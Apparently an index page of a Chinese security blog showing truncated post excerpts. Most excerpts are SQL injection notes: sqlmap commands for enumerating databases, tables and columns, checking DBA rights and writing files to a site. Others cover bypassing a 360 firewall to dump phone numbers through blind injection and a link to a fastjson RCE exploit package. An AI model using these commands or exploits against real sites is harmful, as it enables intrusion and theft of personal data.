2024-12-29
厉飞雨
阅读(336)
评论(0)
赞(16 )
前言
===
近期在学习用airtest进行自动化测试,遇到的坑来记录一下。
问题
===
用pycharm学习airtest的时候发现任何poco的函数都会直接报错raise JSONDecodeError("Expecting value", s, err.value) from None异常,进行debug后发现问题出在**minicap.py*...
2024-12-29
厉飞雨
阅读(365)
评论(0)
赞(16 )
说明
===
爆出一个月了,我现在才有时间来分析一下。
利用
===
先把rmi的server先跑起来,然后在mian里面选个payload就可以看到calc了。
exp自取[fastjson-rce-exploit](http://qiniu.safe6.cn/fastjson-rce-exploit.zip)
漏洞分析
https://xz.aliyun.co...
2024-12-29
厉飞雨
阅读(347)
评论(0)
赞(15 )
最近遇到个盲注点,有个360防火墙,绕了半天只能用 rlike 脱裤,奈何速度巨慢,五分钟一个数字,没法忍.
经过各种折腾,最终打到1秒两三个手机号的效果,记录下折腾的问题,也希望能帮助到同样遇到问题的童鞋.
第一步(提升SQLMAP 线程数):
`\lib\core\settings.py` 找到 sqlmap 的这个文件,搜索 MAX_NUMBER_OF_THREA...
2024-12-29
厉飞雨
阅读(360)
评论(0)
赞(15 )
```bash
1.判断注入点,获取网站信息
sqlmap.py -u http://www.xx.com/ss.asp?id=123
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123"
2.获取所有数据库
sqlmap.py -u http://www.xx.com/ss.asp?id=123 ...
2024-12-29
厉飞雨
阅读(462)
评论(0)
赞(18 )
```bash
权限:必须为dba权限
file-write 从本地写入
file-dest 写入目标路径
判断是否是dba权限(显示TRUE或者FALSE,TRUE即为dba权限,反之不是)
sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --is-dba
写入文件至站点目录
sq...
2024-12-29
厉飞雨
阅读(446)
评论(0)
赞(15 )
注:此方法使用于access数据库,mysql、MSSQL数据库请在第二步获取站点当前数据库及数据库,方法与常规mysql、MSSQL注入一样,只不过在后面加上了"--level 2"这个参数,其他参数照常使用。
```bash
判断数据库,获取服务器,网站环境等参数
sqlmap.py -u http://www.xx.com/show.asp --co...
2024-12-29
厉飞雨
阅读(489)
评论(0)
赞(17 )
1.判断注入的是否存在注入漏洞
---------------
```bash
sqlmap -u "http://www.xxx.com/xx.asp?id=xxx"
root@huc:~# sqlmap -u(-u:指定一个URL) "http://www.xxx.com/xx.asp?id=xxx"
```
2.获取表名
---...
2024-12-29
厉飞雨
阅读(339)
评论(0)
赞(15 )
php+mysql注入方法:http://tieba.baidu.com/p/3723202169
http://www.cnblogs.com/Javame/p/3753060.html sqlmap命令大全
1:access注入
猜解表名 and exists (select \* from admin)
猜解列名 and exists(select userna...
2024-12-29
厉飞雨
阅读(360)
评论(0)
赞(21 )
sqlmap.py -u "url" --tables 列出数据库中的表
( --tables:列出表)
sqlmap.py -u "url" -T 表 --columns 列出表中字段
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
sqlmap.py -u "url" ...
2024-12-29
厉飞雨
阅读(416)
评论(0)
赞(15 )
伪静态注入
-----
```
1.在存在注入的地方加上*,然后获取数据库
sqlmap.py -u "http://www.xx.com/index.php/index/view/id/40*.html" --dbs
2.获取数据库中的表
sqlmap.py -u "http://www.xx.com/index.php/index/view/...